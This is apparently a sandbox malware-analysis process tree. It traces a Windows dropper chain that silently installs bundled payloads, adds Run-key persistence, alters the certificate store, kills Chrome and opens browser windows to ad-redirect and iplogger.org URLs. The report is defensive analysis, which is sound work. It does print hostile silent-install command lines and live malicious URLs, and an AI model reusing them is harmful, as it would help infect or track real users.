C:\Users\Admin\Pictures\Adobe Films\8Px0xZGNRC1ER0CeVlJC0xnq.exe"C:\Users\Admin\Pictures\Adobe Films\8Px0xZGNRC1ER0CeVlJC0xnq.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-KA45E.tmp\8Px0xZGNRC1ER0CeVlJC0xnq.tmp"C:\Users\Admin\AppData\Local\Temp\is-KA45E.tmp\8Px0xZGNRC1ER0CeVlJC0xnq.tmp" /SL5="$202EE,506127,422400,C:\Users\Admin\Pictures\Adobe Films\8Px0xZGNRC1ER0CeVlJC0xnq.exe"7⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-B6HBL.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-B6HBL.tmp\DYbALA.exe" /S /UID=27108⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Sidebar\ZJHVIBCUGH\foldershare.exe"C:\Program Files\Windows Sidebar\ZJHVIBCUGH\foldershare.exe" /VERYSILENT9⤵
-
-
C:\Users\Admin\AppData\Local\Temp\3f-fe243-5f2-f40b5-437db1a298253\Dogisholale.exe"C:\Users\Admin\AppData\Local\Temp\3f-fe243-5f2-f40b5-437db1a298253\Dogisholale.exe"9⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e610⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471811⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad10⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471811⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xe0,0x104,0x108,0xdc,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471811⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185151310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0x78,0x10c,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471811⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721510⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a471811⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\11-3c477-76a-96e97-aadf98adae467\Punyrazhewy.exe"C:\Users\Admin\AppData\Local\Temp\11-3c477-76a-96e97-aadf98adae467\Punyrazhewy.exe"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tl4pvaxz.fln\setting.exe SID=778 CID=778 SILENT=1 /quiet & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\tl4pvaxz.fln\setting.exeC:\Users\Admin\AppData\Local\Temp\tl4pvaxz.fln\setting.exe SID=778 CID=778 SILENT=1 /quiet11⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\FD7DF1F\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\tl4pvaxz.fln\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\tl4pvaxz.fln\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635139627 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"12⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tyv0mwik.qlz\GcleanerEU.exe /eufive & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\tyv0mwik.qlz\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\tyv0mwik.qlz\GcleanerEU.exe /eufive11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10004 -s 23612⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ewkiojlu.a1r\installer.exe /qn CAMPAIGN="654" & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\ewkiojlu.a1r\installer.exeC:\Users\Admin\AppData\Local\Temp\ewkiojlu.a1r\installer.exe /qn CAMPAIGN="654"11⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ewkiojlu.a1r\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ewkiojlu.a1r\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635139627 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ujorwwq4.eyi\any.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\ujorwwq4.eyi\any.exeC:\Users\Admin\AppData\Local\Temp\ujorwwq4.eyi\any.exe11⤵
-
C:\Users\Admin\AppData\Local\Temp\ujorwwq4.eyi\any.exe"C:\Users\Admin\AppData\Local\Temp\ujorwwq4.eyi\any.exe" -u12⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kwhurwrg.4ka\customer51.exe & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\kwhurwrg.4ka\customer51.exeC:\Users\Admin\AppData\Local\Temp\kwhurwrg.4ka\customer51.exe11⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\eaupco50.avo\gcleaner.exe /mixfive & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\eaupco50.avo\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\eaupco50.avo\gcleaner.exe /mixfive11⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9944 -s 24812⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xcfshaqf.bkv\FastPC.exe /verysilent & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\xcfshaqf.bkv\FastPC.exeC:\Users\Admin\AppData\Local\Temp\xcfshaqf.bkv\FastPC.exe /verysilent11⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2CSQR.tmp\FastPC.tmp"C:\Users\Admin\AppData\Local\Temp\is-2CSQR.tmp\FastPC.tmp" /SL5="$A01E8,138429,56832,C:\Users\Admin\AppData\Local\Temp\xcfshaqf.bkv\FastPC.exe" /verysilent12⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-MR2GN.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-MR2GN.tmp\Setup.exe" /Verysilent13⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\FastPc\FastPc\Faster.exe"C:\Program Files (x86)\FastPc\FastPc\Faster.exe"14⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6000 -s 76815⤵
- Program crash
-
-
-
C:\Program Files (x86)\FastPc\FastPc\FastPCV.exe"C:\Program Files (x86)\FastPc\FastPc\FastPCV.exe" /Verysilent14⤵
-
C:\Users\Admin\AppData\Local\Temp\is-4UNJA.tmp\FastPCV.tmp"C:\Users\Admin\AppData\Local\Temp\is-4UNJA.tmp\FastPCV.tmp" /SL5="$40324,138429,56832,C:\Program Files (x86)\FastPc\FastPc\FastPCV.exe" /Verysilent15⤵
-
C:\Users\Admin\AppData\Local\Temp\is-3N736.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-3N736.tmp\Setup.exe" /Verysilent16⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 88417⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 100417⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 101217⤵
- Program crash
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 109217⤵
- Program crash
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 110817⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 108017⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 148817⤵
- Program crash
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 177617⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 176417⤵
- Program crash
- Checks processor information in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 184017⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 131217⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9480 -s 192017⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\System32\gpupdate.exe" /force14⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /f /im chrome.exe14⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe15⤵
- Kills process with taskkill
-
-
-
C:\Program Files (x86)\FastPc\FastPc\Fast_.exe"C:\Program Files (x86)\FastPc\FastPc\Fast_.exe"14⤵
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\otokfwzd.lbp\installer.exe /qn CAMPAIGN=654 & exit10⤵
-
C:\Users\Admin\AppData\Local\Temp\otokfwzd.lbp\installer.exeC:\Users\Admin\AppData\Local\Temp\otokfwzd.lbp\installer.exe /qn CAMPAIGN=65411⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l3vtadfb.5ht\autosubplayer.exe /S & exit10⤵
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\WBiir5hGlETmLNsUlwQONX_F.exe"C:\Users\Admin\Pictures\Adobe Films\WBiir5hGlETmLNsUlwQONX_F.exe"6⤵
- Loads dropped DLL
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0971f17486f8.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0971f17486f8.exeWed0971f17486f8.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0971f17486f8.exeC:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0971f17486f8.exe6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed0901eb1dae126e32.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0901eb1dae126e32.exeWed0901eb1dae126e32.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0901eb1dae126e32.exeC:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0901eb1dae126e32.exe6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09cfb2f9758281d8.exe /mixone4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09cfb2f9758281d8.exeWed09cfb2f9758281d8.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 2406⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Wed09e95ff6b5.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09e95ff6b5.exeWed09e95ff6b5.exe5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Public\run.exeC:\Users\Public\run.exe6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\mm.exe"C:\Users\Admin\AppData\Local\Temp\mm.exe"8⤵
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5584 -s 3007⤵
- Program crash
-
-
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/18tji77⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffcad2a46f8,0x7ffcad2a4708,0x7ffcad2a47188⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2260 /prefetch:28⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:88⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 /prefetch:38⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4068 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5932 /prefetch:88⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5932 /prefetch:88⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1348 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6060 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5804 /prefetch:28⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4392 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6176 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4824 /prefetch:18⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=6684 /prefetch:88⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2244,683248559566343369,13944131223176032423,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5164 /prefetch:88⤵
-
-
